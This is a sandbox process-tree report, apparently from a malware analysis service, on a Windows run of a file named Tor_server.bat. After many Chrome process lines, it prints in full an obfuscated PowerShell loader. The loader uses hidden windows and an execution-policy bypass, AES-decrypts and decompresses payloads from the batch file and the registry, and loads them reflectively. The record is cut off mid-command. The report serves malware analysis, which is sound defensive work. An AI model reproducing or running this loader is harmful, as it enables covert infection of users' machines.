  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=33 --mojo-platform-channel-handle=9124 --field-trial-handle=1808,i,12851220694848150192,17724915782079282363,131072 /prefetch:1
  2⤵
  PID:5880
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=34 --mojo-platform-channel-handle=7928 --field-trial-handle=1808,i,12851220694848150192,17724915782079282363,131072 /prefetch:1
  2⤵
  PID:5900
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=35 --mojo-platform-channel-handle=9632 --field-trial-handle=1808,i,12851220694848150192,17724915782079282363,131072 /prefetch:1
  2⤵
  PID:6044
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=36 --mojo-platform-channel-handle=9804 --field-trial-handle=1808,i,12851220694848150192,17724915782079282363,131072 /prefetch:1
  2⤵
  PID:6132
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=37 --mojo-platform-channel-handle=10132 --field-trial-handle=1808,i,12851220694848150192,17724915782079282363,131072 /prefetch:1
  2⤵
  PID:6200
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=38 --mojo-platform-channel-handle=10436 --field-trial-handle=1808,i,12851220694848150192,17724915782079282363,131072 /prefetch:1
  2⤵
  PID:6208
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=10152 --field-trial-handle=1808,i,12851220694848150192,17724915782079282363,131072 /prefetch:8
  2⤵
  PID:6312
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=40 --mojo-platform-channel-handle=10684 --field-trial-handle=1808,i,12851220694848150192,17724915782079282363,131072 /prefetch:1
  2⤵
  PID:6444
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7820 --field-trial-handle=1808,i,12851220694848150192,17724915782079282363,131072 /prefetch:8
  2⤵
  PID:6656
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=42 --mojo-platform-channel-handle=2688 --field-trial-handle=1808,i,12851220694848150192,17724915782079282363,131072 /prefetch:1
  2⤵
  PID:1956
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=43 --mojo-platform-channel-handle=2684 --field-trial-handle=1808,i,12851220694848150192,17724915782079282363,131072 /prefetch:1
  2⤵
  PID:1564
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=44 --mojo-platform-channel-handle=6440 --field-trial-handle=1808,i,12851220694848150192,17724915782079282363,131072 /prefetch:1
  2⤵
  PID:1284
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=45 --mojo-platform-channel-handle=7920 --field-trial-handle=1808,i,12851220694848150192,17724915782079282363,131072 /prefetch:1
  2⤵
  PID:5444
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=8372 --field-trial-handle=1808,i,12851220694848150192,17724915782079282363,131072 /prefetch:8
  2⤵
  PID:5548
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7856 --field-trial-handle=1808,i,12851220694848150192,17724915782079282363,131072 /prefetch:8
  2⤵
  PID:6336
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7064 --field-trial-handle=1808,i,12851220694848150192,17724915782079282363,131072 /prefetch:8
  2⤵
  PID:6952
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=49 --mojo-platform-channel-handle=2636 --field-trial-handle=1808,i,12851220694848150192,17724915782079282363,131072 /prefetch:1
  2⤵
  PID:6148
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=50 --mojo-platform-channel-handle=5408 --field-trial-handle=1808,i,12851220694848150192,17724915782079282363,131072 /prefetch:1
  2⤵
  PID:4588
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1708 --field-trial-handle=1808,i,12851220694848150192,17724915782079282363,131072 /prefetch:2
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:7032

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
1⤵
PID:4256

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:3224

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\Downloads\Tor_server\Tor_server.bat"
1⤵
PID:5376
- C:\Users\Admin\Downloads\Tor_server\Tor_server.bat.exe
  "Tor_server.bat.exe" -noprofile -windowstyle hidden -ep bypass -command function oSQrn($ZeVYC){ $zeZjK=[System.Security.Cryptography.Aes]::Create(); $zeZjK.Mode=[System.Security.Cryptography.CipherMode]::CBC; $zeZjK.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $zeZjK.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('8BmyvjuHMJ5tOzAFS8WiFn9lK/Q4MbxC0JexUGmrSUA='); $zeZjK.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('9vh1Iw96AMoyaJQxW/OGOQ=='); $wykrF=$zeZjK.CreateDecryptor(); $return_var=$wykrF.TransformFinalBlock($ZeVYC, 0, $ZeVYC.Length); $wykrF.Dispose(); $zeZjK.Dispose(); $return_var;}function hKuIZ($ZeVYC){ $oyWYk=New-Object System.IO.MemoryStream(,$ZeVYC); $DHmQw=New-Object System.IO.MemoryStream; $IstFA=New-Object System.IO.Compression.GZipStream($oyWYk, [IO.Compression.CompressionMode]::Decompress); $IstFA.CopyTo($DHmQw); $IstFA.Dispose(); $oyWYk.Dispose(); $DHmQw.Dispose(); $DHmQw.ToArray();}function IOLLO($ZeVYC,$kejag){ $KOKyF=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$ZeVYC); $QwlUz=$KOKyF.EntryPoint; $QwlUz.Invoke($null, $kejag);}$eeeIZ=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\Downloads\Tor_server\Tor_server.bat').Split([Environment]::NewLine);foreach ($UYkNp in $eeeIZ) { if ($UYkNp.StartsWith(':: ')) { $JpAFv=$UYkNp.Substring(3); break; }}$Rmcyk=[string[]]$JpAFv.Split('\');$zMool=hKuIZ (oSQrn ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($Rmcyk[0])));$Djtyd=hKuIZ (oSQrn ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($Rmcyk[1])));IOLLO $Djtyd (,[string[]] (''));IOLLO $zMool (,[string[]] (''));
  2⤵
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Executes dropped EXE
  - Drops file in System32 directory
  - Suspicious use of SetThreadContext
  - Drops file in Windows directory
  - Suspicious behavior: EnumeratesProcesses
  PID:2332
- - C:\Windows\$sxr-powershell.exe
    "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command function CzXOR($wCmAa){ $OeLLh=[System.Security.Cryptography.Aes]::Create(); $OeLLh.Mode=[System.Security.Cryptography.CipherMode]::CBC; $OeLLh.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $OeLLh.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('swD/g0ddwufYKX/qihDrldk6m+EvFku6CpuKgW+L79U='); $OeLLh.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('hO/TaNK/xjmsS/krRQP/2Q=='); $CdjJU=$OeLLh.('rotpyrceDetaerC'[-1..-15] -join '')(); $ZrPpX=$CdjJU.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($wCmAa, 0, $wCmAa.Length); $CdjJU.Dispose(); $OeLLh.Dispose(); $ZrPpX;}function XSkGH($wCmAa){ $YMVfV=New-Object System.IO.MemoryStream(,$wCmAa); $HPwhP=New-Object System.IO.MemoryStream; $LnniF=New-Object System.IO.Compression.GZipStream($YMVfV, [IO.Compression.CompressionMode]::Decompress); $LnniF.CopyTo($HPwhP); $LnniF.Dispose(); $YMVfV.Dispose(); $HPwhP.Dispose(); $HPwhP.ToArray();}function BdfTq($wCmAa,$IUdXm){ $ZLyfJ=[System.Reflection.Assembly]::Load([byte[]]$wCmAa); $xoyvm=$ZLyfJ.EntryPoint; $xoyvm.Invoke($null, $IUdXm);}$OeLLh1 = New-Object System.Security.Cryptography.AesManaged;$OeLLh1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$OeLLh1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$OeLLh1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('swD/g0ddwufYKX/qihDrldk6m+EvFku6CpuKgW+L79U=');$OeLLh1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('hO/TaNK/xjmsS/krRQP/2Q==');$cXkwu = $OeLLh1.('rotpyrceDetaerC'[-1..-15] -join '')();$UswSE = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('18zwi26zozI/4sNwvOJxpg==');$UswSE = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UswSE, 0, $UswSE.Length);$UswSE = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UswSE);$Dsgcn = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('EkARJ6Rv6BIg2MogoHYcmw/X0/TgnV5+LWpTmFkicv4=');$Dsgcn = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Dsgcn, 0, $Dsgcn.Length);$Dsgcn = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Dsgcn);$WtQaE = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('CPgoovSvydwIKAVbsV0oUg==');$WtQaE = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($WtQaE, 0, $WtQaE.Length);$WtQaE = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($WtQaE);$XVVPy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('iTx/W/jnzoHE14r8DEibMEyuaeYiE3dAqeSv8NW3jSN5A97h+1KY+THryvIh1dJiGmsnJ//SXLVPWbfMRzL7ufXSCGPz+pfVsuxaLTSyptiJPzqcoan9Xr1jE4Rmc5u7LTId80wSaXqLNmoB4fPg/P7NE3c2Yuw0nqWt/ZngWniFYubjYtKMqyyNRSfNgyr89Ug/vFc6LgfL0bPIYeBlHCze7nx8PsBL+Q/EBybHWqUfBjNVsJmx3EeYrFfxNdSC3e8Y+JBmg8TSGLJHyBt+tFwMt/TmHxps75m66JuQeZLlhKeLZ6bjJ74zTvsp2A8buoYwDETvErAcvrBSGhVS7mYWy6o4J4BMWokYyeV+Cq7Q8/73SCovtE69+hmKy7HRlFzPuhkQyPHRSeQjZ9+873yj/eogIwSIkiXGB0fk3+g=');$XVVPy = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVVPy, 0, $XVVPy.Length);$XVVPy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVVPy);$ZnwOj = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('l578nKfyTb6bpNlYfElbzQ==');$ZnwOj = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($ZnwOj, 0, $ZnwOj.Length);$ZnwOj = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($ZnwOj);$cOnuq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('1OZ44W6bdY1aa1QLUX4fJA==');$cOnuq = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($cOnuq, 0, $cOnuq.Length);$cOnuq = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($cOnuq);$gBBaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('KPGj8zPRDGjW+cttrplwtg==');$gBBaw = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($gBBaw, 0, $gBBaw.Length);$gBBaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($gBBaw);$HVXKt = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('wg3LvN/Da8EBkYu0PdZp+A==');$HVXKt = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($HVXKt, 0, $HVXKt.Length);$HVXKt = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($HVXKt);$ewjne = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('bahh8RYkzn28RHBrHTR6Rw==');$ewjne = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($ewjne, 0, $ewjne.Length);$ewjne = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($ewjne);$UswSE0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('7ps7mtx52AURDUYRcez/RA==');$UswSE0 = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UswSE0, 0, $UswSE0.Length);$UswSE0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UswSE0);$UswSE1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('c5XC748b+iFBdBWdnZ4s2w==');$UswSE1 = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UswSE1, 0, $UswSE1.Length);$UswSE1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UswSE1);$UswSE2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('eJLAPTei3F5Fj8pfHCkW0A==');$UswSE2 = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UswSE2, 0, $UswSE2.Length);$UswSE2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UswSE2);$UswSE3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('7VMq7slMB5TL9zlr2duzSA==');$UswSE3 = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UswSE3, 0, $UswSE3.Length);$UswSE3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UswSE3);$cXkwu.Dispose();$OeLLh1.Dispose();$vDMJP = [Microsoft.Win32.Registry]::$HVXKt.$gBBaw($UswSE).$cOnuq($Dsgcn);$ZyJrD=[string[]]$vDMJP.Split('\');$pKkNV=XSkGH(CzXOR([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZyJrD[1])));BdfTq $pKkNV (,[string[]] ('%*'));$quBDS = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZyJrD[0]);$OeLLh = New-Object System.Security.Cryptography.AesManaged;$OeLLh.Mode = [System.Security.Cryptography.CipherMode]::CBC;$OeLLh.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$OeLLh.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('swD/g0ddwufYKX/qihDrldk6m+EvFku6CpuKgW+L79U=');$OeLLh.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('hO/TaNK/xjmsS/krRQP/2Q==');$CdjJU = $OeLLh.('rotpyrceDetaerC'[-1..-15] -join '')();$quBDS = $CdjJU.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($quBDS, 0, $quBDS.Length);$CdjJU.Dispose();$OeLLh.Dispose();$YMVfV = New-Object System.IO.MemoryStream(, $quBDS);$HPwhP = New-Object System.IO.MemoryStream;$LnniF = New-Object System.IO.Compression.GZipStream($YMVfV, [IO.Compression.CompressionMode]::$UswSE1);$LnniF.$ewjne($HPwhP);$LnniF.Dispose();$YMVfV.Dispose();$HPwhP.Dispose();$quBDS = $HPwhP.ToArray();$xnpKq = $XVVPy | IEX;$ZLyfJ = $xnpKq::$UswSE2($quBDS);$xoyvm = $ZLyfJ.EntryPoint;$xoyvm.$UswSE0($null, (, [string[]] ($WtQaE)))
    3⤵
    - Suspicious use of NtCreateUserProcessOtherParentProcess
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    PID:5168
  - - C:\Windows\$sxr-powershell.exe
      "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(5168).WaitForExit();[System.Threading.Thread]::Sleep(5000); function CzXOR($wCmAa){ $OeLLh=[System.Security.Cryptography.Aes]::Create(); $OeLLh.Mode=[System.Security.Cryptography.CipherMode]::CBC; $OeLLh.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $OeLLh.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('swD/g0ddwufYKX/qihDrldk6m+EvFku6CpuKgW+L79U='); $OeLLh.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('hO/TaNK/xjmsS/krRQP/2Q=='); $CdjJU=$OeLLh.('rotpyrceDetaerC'[-1..-15] -join '')(); $ZrPpX=$CdjJU.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($wCmAa, 0, $wCmAa.Length); $CdjJU.Dispose(); $OeLLh.Dispose(); $ZrPpX;}function XSkGH($wCmAa){ $YMVfV=New-Object System.IO.MemoryStream(,$wCmAa); $HPwhP=New-Object System.IO.MemoryStream; $LnniF=New-Object System.IO.Compression.GZipStream($YMVfV, [IO.Compression.CompressionMode]::Decompress); $LnniF.CopyTo($HPwhP); $LnniF.Dispose(); $YMVfV.Dispose(); $HPwhP.Dispose(); $HPwhP.ToArray();}function BdfTq($wCmAa,$IUdXm){ $ZLyfJ=[System.Reflection.Assembly]::Load([byte[]]$wCmAa); $xoyvm=$ZLyfJ.EntryPoint; $xoyvm.Invoke($null, $IUdXm);}$OeLLh1 = New-Object System.Security.Cryptography.AesManaged;$OeLLh1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$OeLLh1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$OeLLh1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('swD/g0ddwufYKX/qihDrldk6m+EvFku6CpuKgW+L79U=');$OeLLh1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('hO/TaNK/xjmsS/krRQP/2Q==');$cXkwu = $OeLLh1.('rotpyrceDetaerC'[-1..-15] -join '')();$UswSE = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('18zwi26zozI/4sNwvOJxpg==');$UswSE = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UswSE, 0, $UswSE.Length);$UswSE = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UswSE);$Dsgcn = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('EkARJ6Rv6BIg2MogoHYcmw/X0/TgnV5+LWpTmFkicv4=');$Dsgcn = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Dsgcn, 0, $Dsgcn.Length);$Dsgcn = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Dsgcn);$WtQaE = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('CPgoovSvydwIKAVbsV0oUg==');$WtQaE = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($WtQaE, 0, $WtQaE.Length);$WtQaE = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($WtQaE);$XVVPy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('iTx/W/jnzoHE14r8DEibMEyuaeYiE3dAqeSv8NW3jSN5A97h+1KY+THryvIh1dJiGmsnJ//SXLVPWbfMRzL7ufXSCGPz+pfVsuxaLTSyptiJPzqcoan9Xr1jE4Rmc5u7LTId80wSaXqLNmoB4fPg/P7NE3c2Yuw0nqWt/ZngWniFYubjYtKMqyyNRSfNgyr89Ug/vFc6LgfL0bPIYeBlHCze7nx8PsBL+Q/EBybHWqUfBjNVsJmx3EeYrFfxNdSC3e8Y+JBmg8TSGLJHyBt+tFwMt/TmHxps75m66JuQeZLlhKeLZ6bjJ74zTvsp2A8buoYwDETvErAcvrBSGhVS7mYWy6o4J4BMWokYyeV+Cq7Q8/73SCovtE69+hmKy7HRlFzPuhkQyPHRSeQjZ9+873yj/eogIwSIkiXGB0fk3+g=');$XVVPy = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVVPy, 0, $XVVPy.Length);$XVVPy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVVPy);$ZnwOj = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('l578nKfyTb6bpNlYfElbzQ==');$ZnwOj = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($ZnwOj, 0, $ZnwOj.Length);$ZnwOj = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($ZnwOj);$cOnuq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('1OZ44W6bdY1aa1QLUX4fJA==');$cOnuq = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($cOnuq, 0, $cOnuq.Length);$cOnuq = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($cOnuq);$gBBaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('KPGj8zPRDGjW+cttrplwtg==');$gBBaw = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($gBBaw, 0, $gBBaw.Length);$gBBaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($gBBaw);$HVXKt = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('wg3LvN/Da8EBkYu0PdZp+A==');$HVXKt = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($HVXKt, 0, $HVXKt.Length);$HVXKt = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($HVXKt);$ewjne = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('bahh8RYkzn28RHBrHTR6Rw==');$ewjne = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($ewjne, 0, $ewjne.Length);$ewjne = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($ewjne);$UswSE0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('7ps7mtx52AURDUYRcez/RA==');$UswSE0 = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UswSE0, 0, $UswSE0.Length);$UswSE0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UswSE0);$UswSE1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('c5XC748b+iFBdBWdnZ4s2w==');$UswSE1 = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UswSE1, 0, $UswSE1.Length);$UswSE1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UswSE1);$UswSE2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('eJLAPTei3F5Fj8pfHCkW0A==');$UswSE2 = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UswSE2, 0, $UswSE2.Length);$UswSE2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UswSE2);$UswSE3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('7VMq7slMB5TL9zlr2duzSA==');$UswSE3 = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UswSE3, 0, $UswSE3.Length);$UswSE3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UswSE3);$cXkwu.Dispose();$OeLLh1.Dispose();$vDMJP = [Microsoft.Win32.Registry]::$HVXKt.$gBBaw($UswSE).$cOnuq($Dsgcn);$ZyJrD=[string[]]$vDMJP.Split('\');$pKkNV=XSkGH(CzXOR([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZyJrD[1])));BdfTq $pKkNV (,[string[]] ('%*'));$quBDS = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZyJrD[0]);$OeLLh = New-Object System.Security.Cryptography.AesManaged;$OeLLh.Mode = [System.Security.Cryptography.CipherMode]::CBC;$OeLLh.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$OeLLh.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join 